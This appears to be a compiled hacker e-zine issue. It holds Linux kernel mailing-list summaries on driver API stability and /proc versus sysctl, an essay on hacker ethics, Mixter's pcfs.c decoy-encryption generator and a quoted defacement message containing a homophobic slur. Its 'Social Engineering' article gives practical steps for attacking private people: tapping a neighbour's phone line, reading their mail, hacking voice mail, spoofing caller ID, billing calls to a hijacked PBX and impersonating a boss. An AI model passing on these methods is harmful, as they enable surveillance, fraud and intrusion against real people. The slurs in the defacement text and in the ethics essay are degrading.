    10. Thing that is probably going to happen RSN: instead of struct gendisk per major we may want to go for struct gendisk per _disk_. It would mean that at some point near ->open() we will put the pointer to it into the struct block_device. One obvious consequence being that partitions-related ioctls() will become completely generic.

    Notice that it is _not_ the same as devfs (and not a beginning of moving devfs into the main tree). It just provides the backplane - no namespace, no nothing. Inodes (either in normal filesystems or in devfs) point to such animals. That's it. Eventually things like ->b_dev, ->b_rdev, ->i_dev, ->rq_dev, etc.
    are going to become pointers to such objects, but it will be done step-by-step - otherwise we'll end up with a moby patch and moby breakage into the bargain... Character devices are not affected at all - IMO using the same type both for block and character device was a mistake. So their handling remains as-is. Probably something should be done for them too, but that's a completely different story.

Richard B. Johnson picked himself up off the floor and said:

    Good grief Charley Brown! You, in a few key-strokes, just blew away major portions of the work done over the past few years by software engineers who ported their drivers to Linux. Linux will never be accepted as a 'professional' operating system if this continues. It's enough of a problem putting one's job on-the-line convincing management to risk new product development to Linux. Once these products are in Production, and bugs are discovered in the OS, we must be able to get the latest version of the OS and have our drivers compile. If this is not possible, you do not have an operating system that is anything other than an interesting experiment.

    For instance, there was a simple new change in the type of an object passed to poll and friends. This just cost me two weeks of unpaid work! Unpaid because I had to hide it. If anyone in Production Engineering had learned about this, the stuff would have been thrown out, the MicroCreeps would have settled in with "I told you so..", and at least three of us would have lost our jobs.

    Industry is at war. You can't do this stuff to the only weapons we have. Once you claim to have a "Professional Operating System", its development must be handled in a professional way. If major kernel interface components continue to change, Linux is in a heap of trouble as are most all of those who are trying to incorporate it into new designs. The industrial use of Linux is not at the desktop.
It involves writing drivers for obscure things like machine controllers (read telescope controllers), Digital signal processors (read medical imaging processors), and other stuff you can't buy at the computer store. It doesn't matter if you fix all of Donald Becker's drivers to interface with the new kernel internals. You have still broken most everything that counts.

There were a number of replies to this. Alexander found Richard's post clueless and Monty-Pythonesque. On a serious (though annoyed) note, he explained, "one of the worst things about block drivers-to-kernel interface is that they share it with files. I.e. _any_ change in file_operations or in struct file or in struct inode and you are deep in it. Change the size of any field prior to ->i_dev and you are in for recompile. Change device number bitness and even recompile may be of little help. Removing those dependencies (not all of them are removed yet, more will follow) is going to save _your_ ass a year later."

Also replying to Richard, Victor Khimenko said, "Drivers MUST be changed with new kernel release (and thus via development branch: development kernels are just snapshots of development process after all). It was true from the start and it'll be true tomorrow. It's true for most OSes available. It's ESPECIALLY true for Linux where drivers are linked directly in kernel. If you expected something other, then you made the wrong choice choosing Linux."

Gregory Maxwell said to Richard:

We all know your position on compatibility. :) Many people, including myself, usually understand and agree with it. However, you are going a little far on this one. The change is going into 2.3.x, and that *IS* the appropriate place to break interfaces. These kinds of changes should certainly not be introduced into 2.2.x. This should cause you little difficulty, as your example of having to upgrade to fix a bug should not apply. When you upgrade to fix a bug then you should just be increasing patchlevel.
If there is not a patch for a bug in 2.2.x which is fixed in 2.4.x then there is a bug in the Linux development process. In order to move forward, we *must* break things. To make up for this we continue to maintain old versions. There are still bugfixes being made against 2.0.x and there will be bugfixes against 2.2.x. RedHat even still issues updates against RH4.2.. So if this were to have occurred within a stable kernel version, or if it had severely affected userspace, I would agree.

Rik van Riel put it this way to Richard:

Industrial use of Linux usually doesn't involve the kernels which are marked as `development', ie. where the `middle' version number is odd and where major things are expected to change. People venturing out on that terrain can know what they're heading into (see http://kt.linuxcare.com/) and shouldn't come whining when some actual development happens in the development branch of the kernel. They should only whine when development stops, not when useful changes are taking place...

But David Parsons objected to Rik, "Except, of course, that when the changes go in they are never backed out so the interfaces remain stable for the production kernels. That's the *really* annoying thing about this line of argument; when else should someone complain that an interface has been turned into gravel? If you wait until the development tree has become a production tree, enough code will be modified to work with the New! And! Improved! interfaces that your complaints (cf: old-style fcntl locking) will be dismissed sight unseen by the Core Team." He added, "The big support providers are the ones who benefit from interface churning. It's the small shops that get bitten in the ass because they don't have enough money to buy programmers or enough time to do the patches." There was no reply to this.

Alan also replied to Richard with the quote of the day, saying, "Linux isn't at war. War involves large numbers of people making losing decisions that harm each other in a vain attempt to lose last. Linux is about winning."

At some point, Richard posted again, having received many private emails in addition to the slew on the list. He said:

I have gotten a lot of mail on this so I will reply only once.

Many of the professional industrial uses of Unix were previously covered using Sun boards, boxes and SunOs. If you ever dial 10 before a long-distance number to get a cheaper rate, that's voice over IP and we make that stuff. This was developed on Suns, runs on them, but will soon be running on cheap Intel clones. If you ever have to go to the hospital and have a CAT-Scan or a MRI, you are using equipment developed by us, even though the name on the box may be Phillips, General Electric, Toshiba, or various other companies. You can look at http://www.analogic.com and see what we do for a living here.

The Sun driver interface has been constant. Unfortunately, you have to install it, meaning link it and reboot. When installing a system, meaning the complete software package, the end-user's technician installs the OS from a CDROM. Then the application with its drivers are installed from another CDROM. This works on Suns and has been the de facto standard way of doing things. Linux was not suitable for the applications running on Suns until Linux provided the installable device driver. The ability to install a hardware-interface module into a kernel was my main selling point for using Linux to replace SunOs, and, indeed the whole Sun architecture.

Incidentally, the cost is the same. A CDROM for Solaris is essentially the same cost as a CDROM for Linux. Once you start distributing an operating system and supporting the distributors, a "free" operating system is no longer free.

By the time a decision was made to produce our new Exact Baggage Scanner, marketed by Lockheed-Martin, engineering management was dragging its feet on the use of Linux.
They wanted something that was "everything to everybody", but didn't want the cost of using Suns. Further, it had to be completely under company control. I was unable to convince anybody to use Linux so I had to write my own Operating System. It is called ARTOS (Analogic Realtime Operating System). Our Sky Computer Division, which produces the world's fastest (still) digital signal processor, made the high-speed stuff, a lowly Intel Pentium with my OS is used as the system controller, and an Alpha Workstation is used for the user interface.

When this was completed, we went on to producing our third generation CAT Scanner. This uses a Pentium as the main system controller and Linux as the operating system. The User Interface uses Windows-NT. It was felt that Linux was sufficiently well-hidden in the bowels of the machine so nobody would care. The drivers in this machine comprise both block and character devices. One of the major building blocks is the driver that interfaces to the Digital Signal Processor. This DSP board comprises up to 32 TMS-320C20 DSPs plus an i960 for interface. It is made by our CDA Division. Completed data, available within a 32k window, a 512x512x16bit chunk, must be transferred to the User Interface within 1/4 second to make the specification. It does.

Now, our legal department has defined the criteria we must meet to use Linux. They presume that we will provide a "current distribution" of Linux to every end-user. They also defined that, since drivers may be deemed to modify the operating system, we have to provide driver source-code to the customer if they request it. Application code continues to be proprietary.

Changing the kernel interface to drivers is counter productive. In fact it makes the usual field installation impossible. The usual installation would automatically and transparently compile the interface modules, using the new Operating System. This is no longer possible because the compilation will fail.
Again, if Linux is to become other than an interesting experiment, one cannot change these interfaces without understanding the whole picture. Distributors don't care. The more changes there are, the greater the obsolescence, the more money they make selling new boxes of CDROMs. Therefore there is no controlling negative feedback to be obtained from the distribution channel.

You can reject what I say out-of-hand, and continue as an experiment, or you can listen and make a significant contribution to providing jobs worldwide.

It is, of course, possible to fragment Linux. A company could be started, called StableLinux, that distributes only Linux n.n.n and performs bug-fixes and maintenance on that version only. This is not helpful to the greater Linux community. Instead, we need to minimize the changes that affect the interfaces to world-wide applications. Just as POSIX attempted to stabilize the API so that one could write "portable" code, the interface to hardware that hasn't even been invented yet has to be stable.

Chris Adams and Horst von Brand suggested that "current distribution" referred to even-numbered minor version numbers only. Horst expanded, "OK, "current distribution" means 2.2.x kernel today, and was 2.0 sometime back. It will be 2.4 in a few months time, and perhaps 2.6 in a year and a half. You are supposed to distribute the machine and source to drivers &c _when shipped_, I'd assume. Check the code, test it to breaking *and keep it*. Ship that to customers, and either offer upgrades to 2.4 if needed for some reason, or stay put."

Elsewhere, replying to Richard's original post, Jamie Lokier said, "If you need a stable API, you chose the wrong operating system. It's no secret that Linux APIs change. You can't blame the kernel developers for doing exactly what they said they will do. If you want, you can blame the people who incorrectly assumed the APIs would stay the same, for not investigating the obvious."
And Ted added, "If you told your management that Linux kernel interfaces never change across versions, then you were sadly mistaken. However, the mistake is on your end, I'm afraid." To this, Richard replied:

No. According to our Legal Department, to satisfy the GPL requirement that we provide source to the end-user, they required that we supply a "current" distribution of Linux if the end-user requests it. This seemed, by them, to be an easy solution to possible problems. Unfortunately, for Engineering, this means that we have to keep everything "current" during development so that, by the time equipment is shipped, it will run with the "current" distribution (whatever this is).

The obvious solution, given these constraints, is that we just ignore all changes until shipping time, then attempt to compile with the latest distribution, fixing all the problems at once. However, we then end up shipping untested software which ends up being another problem. Checking to see if it "runs" isn't testing software in the cold cruel world of industry.

So, presently, I have 13 drivers I have to keep "current". Yesterday they all got broken again. A week before, half of them were broken because somebody didn't like a variable name!

That said, a major problem with changes that I see, is that the changes are made without the notion of a terminating condition. For instance, new parameters are being passed to existing interface functions. If you are going to break an interface, you should plan on only breaking it once rather than opening the door for more changes and leaving it open. For instance, once you have to pass more than (depends upon the machine) about 3 parameters, it's best to put them all in a parameter-list (structure) and pass only the address of the parameter list (pointer). From that time on, you only have to add structure members to the parameter list if you have to add changes. If I had seen these kinds of changes I would not have complained. It means I have to rework stuff only once. So `read(f,.......)` should have been changed to `read(params *)` and you are done with it forever as long as you don't change structure member names and functions for kicks.

This time it was Alexander's turn to pick himself up off the floor; and in response to the first paragraph of Richard's post, said, "Oh. My. God. They are requiring you to do WHAT??? Do you mean that you really ship 2.3.x to your customers? Arrggh. "Source" == "source of what we are shipping". And not "anything that was written by other guys who started from the same source". It's utter nonsense. _No_ license can oblige you to include the modifications done by somebody else. Otherwise you'd have those drivers in the main tree, BTW - _that_ much should be clear even for your LD."

But David Lang put in, "he is not saying that he has to ship a 2.3 kernel, he is reacting to the fact that he will have to ship a 2.4 kernel. The blame for this lies squarely on the legal department who decided that they had to ship a "current" distro. There is some semblance of reason for this as they want to try and limit the support costs by not using "obsolete" versions, but given the way many of the major distros patch the kernel before shipping it you still may have problems. The answer is to figure out some way to educate the legal department to allow for a more gradual change."

#fundamental

Taken from http://kt.linuxcare.com/latest.epl on 2/3/2000, this is just one example of serious design problems with Linux, and serious questions about its present and future direction, considering the plans laid out by its creator. Apparently speed and efficiency aren't as important to Linus as having a pretty filesystemish interface. Hope you didn't want to do anything useful with your CPU in userspace...

/proc And sysctl()
2000/01/06 - 2000/01/12 (43 posts): /proc guidelines and sysctl

Benjamin Reed wrote a wireless ethernet driver that used /proc as its interface.
But he was a little uncomfortable defining his own namespace under /proc, and asked if there were any conventions he should follow. He added, "And finally, what's up with sysctl? Are driver writers recommended to use that over extending /proc or is it deprecated? Again, guidelines would be nice."

Linus replied with:

The thing to do is to create a /proc/drivers/<mydriver>/ directory. The /proc/drivers/ directory is already there, so you'd basically do something like

    create_proc_info_entry("driver/mydriver/status", 0, NULL, mydriver_status_read);

to create a "status" file (etc etc).

For the sysctl question, he added, "sysctl is deprecated. It's useful in one way only: it has some nice functions that can be used to add a block of /proc names. However, it has other downsides (allocating silly numbers etc - there should be no need for that, considering that the /proc namespace is already a perfectly good namespace)."

Marcin Dalecki flamed Linus:

Are you just blind to the neverending format/compatibility/parsing/performance problems the whole idea behind /proc induces inherently? Oh yes, they don't turn up that frequently any longer, since everybody learned in the time between not to touch anything there, like a heap of shit. Instead of changing something, one leaves the broken /proc interface where it is and adds just another new file (or even dir) there.

My favorite examples for how broken they are:

/proc/stat     the information there is entirely *broken*, misleading and incomplete. (leftover from early days.)
/proc/pci      static data continuously reconstructed on the fly. (binary to string and then back string to binary in userland...) And now (2.3.xx) it's even binary only...
/proc/cpuinfo  same here, static data. uname has been the proper interface for this stuff since the beginning.
/proc/ksyms    entirely redundant and not used by the modutils.
/proc/modules  entirely redundant to the module syscalls. *Not* used by lsmod.
/proc/version  entirely static data with no apparent value.
/proc/kmsg     entirely redundant to syslog.

One could continue with no end...

root:/proc# cat meminfo
        total:    used:    free:  shared: buffers:  cached:
Mem:  64577536 62787584  1789952 20643840  1339392 17186816
Swap: 139821056 36478976 103342080
MemTotal:     63064 kB
MemFree:       1748 kB
MemShared:    20160 kB
Buffers:       1308 kB
Cached:       16784 kB
SwapTotal:   136544 kB
SwapFree:    100920 kB

Wonderful!!!! The same data twice, albeit neither of them easily parsed! Easily parsed? By what? AWK? SED? Or should the procps utilities be implemented in damn PERL? (Some losers who don't know C would appreciate this, certainly) !!!!! The only thing I'm missing is adding floating point formats to this...

And then there is the phenomenon of proliferation of /proc items. Just an example...

root:/proc/ide# find /proc/ide
/proc/ide
/proc/ide/drivers
/proc/ide/hdd
/proc/ide/ide1
/proc/ide/ide1/hdd
/proc/ide/ide1/hdd/capacity
/proc/ide/ide1/hdd/settings
/proc/ide/ide1/hdd/model
/proc/ide/ide1/hdd/media
/proc/ide/ide1/hdd/identify
/proc/ide/ide1/hdd/driver
/proc/ide/ide1/model
/proc/ide/ide1/mate
/proc/ide/ide1/config
/proc/ide/ide1/channel
/proc/ide/hda
/proc/ide/ide0
/proc/ide/ide0/hda
/proc/ide/ide0/hda/smart_thresholds
/proc/ide/ide0/hda/smart_values
/proc/ide/ide0/hda/geometry
/proc/ide/ide0/hda/cache
/proc/ide/ide0/hda/capacity
/proc/ide/ide0/hda/settings
/proc/ide/ide0/hda/model
/proc/ide/ide0/hda/media
/proc/ide/ide0/hda/identify
/proc/ide/ide0/hda/driver
/proc/ide/ide0/model
/proc/ide/ide0/mate
/proc/ide/ide0/config
/proc/ide/ide0/channel

Hell, only God knows what they are good for! And there is no userland tool for this. This is the last thing Mark Lord added before ditching ide development.

root:/proc/sys# find /proc/sys | wc
    208     208    7305

Don't tell me any sane admin will fiddle with ALL this... And especially, any sane system doesn't need this degree of pseudo configuration flexibility.
And here my ABSOLUTE FAVORITE:

  PID USER     PRI  NI  SIZE  RSS SHARE STAT  LIB %CPU %MEM   TIME COMMAND
21821 root      19   0  1032 1032   816 R       0  4.7  1.6   0:00 top
                                                    *
                                                   ***
                                                  *****
                                                 *******
                                                *********
                                                   ***
                                                   ***
                                                   ***
                                                   ***
                                                   ***
                                                   ***

Yes, reading files, walking dirtrees and parsing them is indeed very very time consuming. I would like to know how well this design will scale to an enterprise server with 32 CPU and X*10000 concurrent processes:

user:~/mysweethome: Message from root@localhost to user@localhost received... BLAH BLAH: "Please stop any intensive intermittent computational activity. Due to maintenance work I'm going to run ps auxw in 5 minutes. Thanks in advance for your understanding! Yours sincerely: root@localhost"

Oh, don't tell me procps could have been done better; there were years of time for this and apparently nobody managed to get it right for practical reasons.. I think you don't write enough user-land code... (just a guess) Go and just compare for example the ps/netstat utilities from *BSD just to see WHY /proc as it is, is a BAD design :-). Maybe it appears cute as an idea to have something like this, but in practice something like this is inevitably going to result in a coding mess, esp. in such an uncoordinated effort like Linux. And I didn't even tell a word about the bloat/mess/races inside the kernel code caused by this all...

Really man, sysctl *is* much much saner and what should be "deprecated" is /proc.

There was a bit of discussion, but Linus did not reply.

Alexander Viro replied to Linus' statement that sysctl was deprecated. He burst out with:

Oh, please! All we need is sysctlbyname(2) - _not_ a problem, and closes all problems with numbers. And it should not work through mounted procfs - we can traverse the tree doing comparisons by name just fine. The fact that sysctl(8) needs mounted procfs is an artificial misfeature, nothing more.

What _is_ bogus is the idea of sysctl() doing more than read/write access to constant-sized variables.
Or procfs entries doing ioctl(), for that matter - just look at /proc/mtrr, for one specimen. sysctl() is a perfectly reasonable subset of pseudofs-type stuff, with well-defined semantics (unlike the rest ;-/). The rest is pretty much a maze of twisted little formats, none alike. IMO dissolving the thing is _not_ a good idea. You have the final word, indeed, but I think that sysctlbyname() may remove most of the problems.

Linus replied that he'd accept a patch to turn sysctl into a proc-only thing. He added, "The current problem is that sysctl tries to be more than proc, and has its own name-space etc. Not worth it."

Andi Kleen proposed, "The nice thing of giving up the sysctl numbers is that it would be possible to use some ELF section based scheme for declaring sysctl variables in nice wrapper macros. You could get a sysctl variable with a single declaration. This would make them a lot more easy. Would you accept a patch for that?" Linus replied, "Show me the patch, and I can consider it. It would certainly be nicer than what it is now (the include/linux/sysctl.h file is EVIL, and a perfect example of the kind of idiotic brokenness we used to have in /proc before it was cleaned up)."

Theodore Y. Ts'o also replied to Alexander, saying, "I actually like the original sysctl() design --- including the use of reserved numbers. After all, we have system calls, and we don't try to look up system calls when we executed them by name..... why is this OK for system calls, but not OK for sysctl()?" Linus replied:

Because system calls are performance-sensitive. And system calls are not clearly "hierarchical". And system calls are supposed to be there regardless of what software and hardware configuration we have there.

In contrast, sysctl isn't all that performance-sensitive, AND they are extremely hierarchical, AND they depend on configuration and timing.

In short, sysctl NEEDS:

 - "naming": you cannot name the sysctl space with a number: it is much too dynamic for that. How do you enumerate drivers? Give them random numbers?
 - "listing": showing which sysctl's are there, in a hierarchical manner. Again, a listing is useless with a number.
 - "hierarchy". You have different devices, but they have the same controls. Do they get the same name? Yes. But in different places in the hierarchy.

In short, you NEED a filesystem. You need to be able to "ls" the thing. You need to be able to search the thing. You need to be doing all the things you can do with a real filesystem. And flattening it out and trying to number it does not work. Never has, never will. It's not an enumerated space.

Sun Jul 30 04:40:22 EDT 2000 linux/stupidity.src
Updated: Fri Jul 21 2000 1:13.15
Copyright © 1998-1999 by Nick Johnson. All rights reserved.

@HWA

313.0 [IND] Article submission on 'Social Engineering' by tekneke
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Social Engineering by Tekneke

Introduction:

The purpose of this text is to introduce or better explain the art of social engineering. This is one of the most difficult things to explain, but I found a rather easy method of doing it until you perfect your skills.

Cross Analyzation:

To begin social engineering you must know how to cross-analyze someone. Cross Analyzation is basically determining someone's personality by looking at them. This can be fairly easy because people make the way they live so obvious to others. For example, how would you determine someone as being a homeless drunk? By their clothes, hygiene, smell, a bottle of alcohol in their hand, etc. Cross analyzation can also be used over the phone, but this method is not reliable in some cases. It is still a very useful tool when social engineering. Listen for things such as their tone of voice, the way they answer the phone, mumbling, stuttering, etc. You can also see how gullible someone is if you tell them that they won a sweepstakes and you want to collect some information about them, and they don't hang up on you.
Information Gathering:

Information gathering these days is very easy. For example, if you wanted to find out the phone number of your next-door neighbor, simply log onto the internet, go to portal.cyberarmy.com and type in what you know, whether it be the phone number, address, or full name. Another method would be snooping through their mail and trash. The best method (in my opinion) is to run a tap on their line. This way you can use what you heard to make a better cross-analyzation, and you might gain some valuable information such as usernames and passwords (which could doubtfully be obtained by social engineering, or you wouldn't be reading this), and maybe you'll even be able to get some dirt on them. Another method would be to get the old binoculars out and watch as they enter passwords for e-mail on their computer or as they chat with people. Another method I have used in the past is hacking their voice mail box or answering machine. If you do all of this you will have a shitload of information on them. Now to get to the engineering.

Getting Prepared:

Before calling your victim you might want to get a caller ID spoofer or go box someone else's line. Another useful tool is a voice changer. If you do use a voice changer, make it sound like you are a woman, because most men will listen to and believe what women tell them more than men. You might also want to see what kind of countermeasures they have by snooping around the building or office that is your target. If it's just someone's house then you can assume that they have caller ID, and some have anonymous call rejection. You might also want to route your call through a PBX if you have access to one; that way, if you call out of area, it's billed to them. Another tip would be to call your target up to see what you have to say or do to get the information you want from a person. For example, if you were trying to get an operator to tell you the number you are dialing from, you might want to imitate a telco guy and say you are calling from a trunk (which might work). You might also want to find out about that person's boss so that you could imitate him/her. This is a very good idea if you can imitate their tone of voice and their slang. And if they give you some shit, just give them shit back and say you're gonna fire them!!!

Social Engineering:

Now it's time to put all that effort to work. This should actually be the easiest part if you successfully completed the other stuff. If not, you are gonna have to do some serious bullshitting. You might want to rehearse what you are gonna say as best as you can, but you must expect the unexpected. If the target is on a PBX, then hack into an account (such as the boss's) and call them from that. Or you could box the boss's house if you know where he/she lives.

This is only the first version of this text. I will be releasing more tips and tricks of the trade. This may be a short text, but it is a lot more informative than the other ones out there. Anything to add or change? Send it to tekneke@geeks404.com.

314.0 [IBT] Ethics & The Underground, What the hell happened? - Gh0zt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By: Gh0zT

When I first came onto the scene in '95, I found the underground scene to be quite hospitable. People I met were friendly, and if you said something out of place it was merely looked down upon. Today things have made a drastic change for the worse; the scene has become a war zone, if you will. There are crackers, script kiddies, hackers, warez pups, groupies (a.k.a. scene whores) and just plain old idiots. I don’t like to stereotype, but unfortunately that is the way it is.
Never have I seen such chaos in the scene; the long-held traditions of ethics and netiquette have basically been forgotten, or were never learned by the newer generation. Many people have tried to explain why this has happened, but personally I think the blame falls on veteran hackers that have not lent a hand to up-and-coming newbies when they asked for help. So, over time the newbies became script kiddies by learning to hack the easiest way they could: by simply running a script or program that someone else wrote. And over time, after being rejected by legitimate hackers, they developed a serious attitude.

The second part of the blame also falls on the media. They have brought a sub-culture that was meant to be just that, a sub-culture, to the mainstream, and to the attention of the public. Our ranks have swollen since high profile hacks started reaching the 10 o'clock news and movies started having technical themes. One movie I think we all can remember is "Hackers." Even though the story line was totally false, it made thousands of eager kids join the scene with handles such as "Zero Cool" and "Lord Nikon."

Another very apparent reason for the swell in our ranks has been media interviews. A lot of big name hackers have gone commercial and now call themselves White Hat Hackers; in other words, hackers for hire. I have nothing against these people because they are doing what they love and getting paid a lot of money for it. However, sometimes they seem to forget that each of us at one time was a neophyte and NONE of us were born with a nix manual. Sometimes they need to stop for a second and actually befriend someone who is having trouble. That, in my humble opinion, is a part of the reason for the decline in ethics. The other is a lack of role models. Yes, some hackers such as the world renowned Cult of the Dead Cow have remained in touch with their peers, but other groups have not and don't want anything to do with newbies.
The motto of these people is "Read the Fucking Manual." I have news for all of those types of people: the person you just blew off might have had experience in another area such as programming, or some other kind of knowledge that you yourself are lacking, but they just need that little boost to help them out a bit. The worst part is you will never know, and you might have hampered your own growth by blowing them off.

Almost every day I hear about web site defacements, with the media describing ALL hackers as criminals and comparing us to common thugs, although this is not true. One thing we all have to remember about people is this: if they don't understand a culture they will be biased against it. It is kind of the same when the general public thinks of a hacker as a nerdy white guy who is pale as paper and sits in a room all night trying to get their credit card numbers. No one thinks that anybody on the street could be a hacker. I can remember once when I had not gotten a hair cut nor shaved for four months. This was due to a lack of time and laziness. One day I met someone at work who was asking a question about computers. I responded with the answer he needed and he looked at me strangely, as if he had seen a ghost. It was incomprehensible to him that I possessed computer knowledge, and when I asked him, "Why the strange look?", he responded that he didn’t think I even had a computer, much less knew how to turn one on. There has been so much stereotyping that normal people just don’t think that the person working next to them or even the garbage man could be a hacker, or even involved in the computer underground. The truth of the matter is, although a large majority is white, there are plenty of minorities actively involved in the scene.
If you’re like me, then you are sick of hearing about kids nuking some sixty-year-old grandmother offline because she simply stated a religious viewpoint, or waking up and hearing about some 15 year old "hacker" because he cracked his school network and changed his grades… Now is the time to start setting examples for both neophytes and script kiddies alike, because they are our future, and without ethics the scene will become what the media is making it out to be.

Generally I always try to help people when I can. If someone asks a question, just try to have patience and help them out, even if it is a "how do I hack my girlfriend's hotmail account" type of question. Do not simply tell them to go fuck themselves; just give them an appropriate answer and/or suggest a better course of action.

One major thing that is getting a lot of people in trouble is the fact that some of us do not know when to stop bragging and when to shut up. If you didn’t know, that is one of the biggest ways people in the scene get busted: by agents posing as fellow scene members.

When you are on a chat service, remember to treat people like you want to be treated, because it leaves a lasting impression on people. So just think next time you go into a chat room. Someone who you might meet later in life could be there, and you might turn him or her off to helping newbies. If you see someone such as a "groupie" (a.k.a. scene whore), make sure you turn a kind cheek and remember not to get down with them, because it could lead to your downfall. Scene whores make other women look bad, because if a female is legitimately trying to get into the computer security scene, then they make it harder because their male counterparts don’t respect them as much as other males. So, in other words, just treat females equally even if they are whores.

Those are my opinions, and they are just that, opinions. I also hope that I made people think and form their own opinions.
That was what I was aiming for, but in truth I have to say, "Wake Up." We are getting more and more restrictions slapped on us and we are just taking it. There needs to be a unified underground to help each other out when we need it. But like I said, this is only my opinion. I also must commend Carole Fennelly on her response to an article that was published on HNN about scene whores.

@HWA

315.0 [IND] PCFS.C by Mixter
~~~~~~~~~~~~~~~~~~~~~~

This is totally cool, check it out, another gem from Mixter. - Ed

home:  http://mixter.void.ru
email: mixter@newyorkoffice.com

/*
 * pcfs - pseudo cryptographic file system
 * (c) 2000 by Mixter
 *
 * This tool just creates a recursive directory and file structure
 * that contains purely random data, but is indistinguishable from a
 * encrypted CFS directory, unless an extensive cryptanalysis is performed.
 * This can be taken as a proof that a strange directory cannot easily be
 * proven to actually contain encrypted data. May be useful against f3dz,
 * just for decoy purposes, or to keep people from analyzing your
 * cryptographic file systems structure. Distributed according to the GPL.
 *
 * WARNING: THIS PROGRAM IS SUBJECT TO PSEUDO-CRYPTOGRAPHIC EXPORT
 * CONTROLS AND US-RESTRICTIONS AGAINST RANDOM DATA! =P
 * This code was reviewed and approved by the SCC (sloppy code commission)
 *
 * gcc -Wall -O2 pcfs.c -o pcfs
 */

/* the header names were lost in the zine's extraction; these are the
   ones the calls below need (stdio, stdlib, string, unistd, fcntl,
   sys/types, sys/stat, sys/time, sys/resource) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/resource.h>

#define START_PATH "fake"

/* permission bits a generated file or directory may get */
mode_t modes[7] = {00755, 00644, 0000, 00664, 00700, 00777, 00444};
char chr[16] = "abcdef1234567890", rseed[65535], buffer[256];
char wd[200];
int rcounter = 0;		/* bytes of rseed not yet consumed */

void random_init (void);
long gr (int, int);
char *rname (void);
mode_t rmode (void);
void mkfiles (void);
void mkd (char *, int);

int
main (void)
{
  printf ("Creating fake file system in %s/%s, press a key\n",
          getcwd (wd, 200), START_PATH);
  (void) getchar ();
  printf ("Hit CTRL+C to stop - creating files");
  if (!geteuid ())
    setpriority (PRIO_PROCESS, 0, -10);
  mkd (START_PATH, 0);
  return 0;
}

/* create a directory and descend into it; with forking != 0 a child
   process does the work and the parent returns to its own loop */
void
mkd (char *dirname, int forking)
{
  printf (".");
  fflush (stdout);
  if (forking)
    if (fork ())
      return;
  mkdir (dirname, rmode ());
  getcwd (wd, 200);
  strcat (wd, "/");
  strcat (wd, dirname);
  chdir (wd);
  if (forking)
    mkfiles ();
  else
    {
      /* top level only: fake the bookkeeping files a CFS directory carries */
      char smbuf[32];
      int a, f = open ("/dev/urandom", O_RDONLY);
      read (f, smbuf, 32);
      a = open ("...", O_WRONLY | O_CREAT | O_TRUNC, 00644);	/* hash */
      write (a, smbuf, gr (5, 10));
      close (a);
      sprintf (smbuf, "%ld", gr (1, 5));
      a = open ("..c", O_WRONLY | O_CREAT | O_TRUNC, 00644);	/* algorithm */
      write (a, smbuf, strlen (smbuf));
      close (a);
      read (f, smbuf, 32);
      a = open ("..k", O_WRONLY | O_CREAT | O_TRUNC, 00644);	/* encrypted key */
      write (a, smbuf, 32);
      close (a);
      close (f);
      sprintf (smbuf, "%ld", gr (1000, 900000));
      a = open ("..s", O_WRONLY | O_CREAT | O_TRUNC, 00644);	/* session blah */
      write (a, smbuf, strlen (smbuf));
      close (a);
      while (1)
        mkfiles ();
    }
}

/* fill the current directory with random-sized files of random bytes,
   each with a ".pvect_*" symlink pointing at it, and now and then
   recurse into a new subdirectory */
void
mkfiles (void)
{
  while (gr (0, 25))
    if (!gr (0, 10))
      mkd (rname (), 1);
    else
      {
        int f = open ("/dev/urandom", O_RDONLY), x, y = gr (0, 65500);
        char fname[256], fn2[256], big[65535];
        memset (fname, 0, 256);
        memset (fn2, 0, 256);
        sprintf (fname, "%s", rname ());
        sprintf (fn2, ".pvect_%s", rname ());
        symlink (fname, fn2);
        x = open (fname, O_RDWR | O_CREAT, rmode ());
        read (f, big, y);
        write (x, big, y);
        close (f);
        close (x);
      }
}

/* random hex-looking name, 5 to 150 characters long */
char *
rname (void)
{
  int i;
  memset (buffer, 0, 256);
  for (i = 0; i < gr (5, 150); i++)
    buffer[i] = chr[gr (0, 15)];
  return buffer;
}

mode_t
rmode (void)
{
  return (modes[gr (0, 6)]);
}

/* refill the seed pool from the kernel; bail out rather than index
   an empty pool if neither device could be read */
void
random_init (void)
{
  int rfd = open ("/dev/urandom", O_RDONLY);
  if (rfd < 0)
    rfd = open ("/dev/random", O_RDONLY);
  rcounter = read (rfd, rseed, 65535);
  close (rfd);
  if (rcounter < 2)
    {
      perror ("random_init");
      exit (1);
    }
}

/* random number in [min, max]; each call burns two pool bytes as a
   fresh seed. The original read rseed[rcounter], one byte past the
   data actually filled, so the indices are shifted down by one here;
   srandom() is used instead of srand() because only glibc ties the
   two generators together. The "inline" on the original was dropped
   since under C99 inline rules it fails to link. */
long
gr (int min, int max)
{
  if (rcounter < 2)
    random_init ();
  srandom (rseed[rcounter - 1] + (rseed[rcounter - 2] << 8));
  rcounter -= 2;
  return ((random () % (int) (((max) + 1) - (min))) + (min));
}

@HWA

316.0 [IND] The hypocrisy runs rampant, prizm, mr anti-defacement himself, defaces?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

When I knew prizm he was VERY anti-web defacement, and anti-script kiddy, I'm not sure if this was really done by him but it does fit his attitude and way of speaking... also b0f security has not existed for months now, not to mention he quit several times and was VERY quiet last we spoke...

Aug 10th 2000
link: Attrition http://www.attrition.org/mirror/attrition/2000/08/10/www.mothermadetoys.com/

<title> sure, you can do it </title>

hacked by prizm of b0f security.

I hacked this server to say that attrition.org are a bunch of hypocrite faggots for hosting their defacement archive, yet they don't condone defacements. They say that script kiddies are stupid for running around defacing all these random servers, yet, they host a defacement archive that 90% of media organizations visit to keep tabs on hacks. What it seems like to me is that the attrition crew are nothing but a bunch of lame media whores that want to get their 15 minutes of fame in this huge media surge from the media about hackers and hacking. Also, doesn't it seem kinda odd that some of the attrition crew are "security consultants" and host a defacement mirror?
